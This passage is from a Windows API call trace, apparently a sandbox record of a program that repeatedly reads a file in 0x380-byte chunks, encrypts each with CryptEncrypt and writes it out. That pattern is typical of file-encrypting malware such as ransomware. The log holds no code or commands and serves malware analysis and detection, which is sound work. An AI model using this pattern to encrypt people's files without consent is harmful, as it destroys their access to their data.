lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.512] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.513] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.513] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.513] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.513] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.514] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.514] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.514] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.514] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.514] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.514] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.515] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.515] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.515] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.515] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.516] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.517] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.517] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.517] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.517] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.518] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.518] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.518] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.518] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.518] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.519] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.519] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.519] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.519] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.519] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.519] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.520] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: 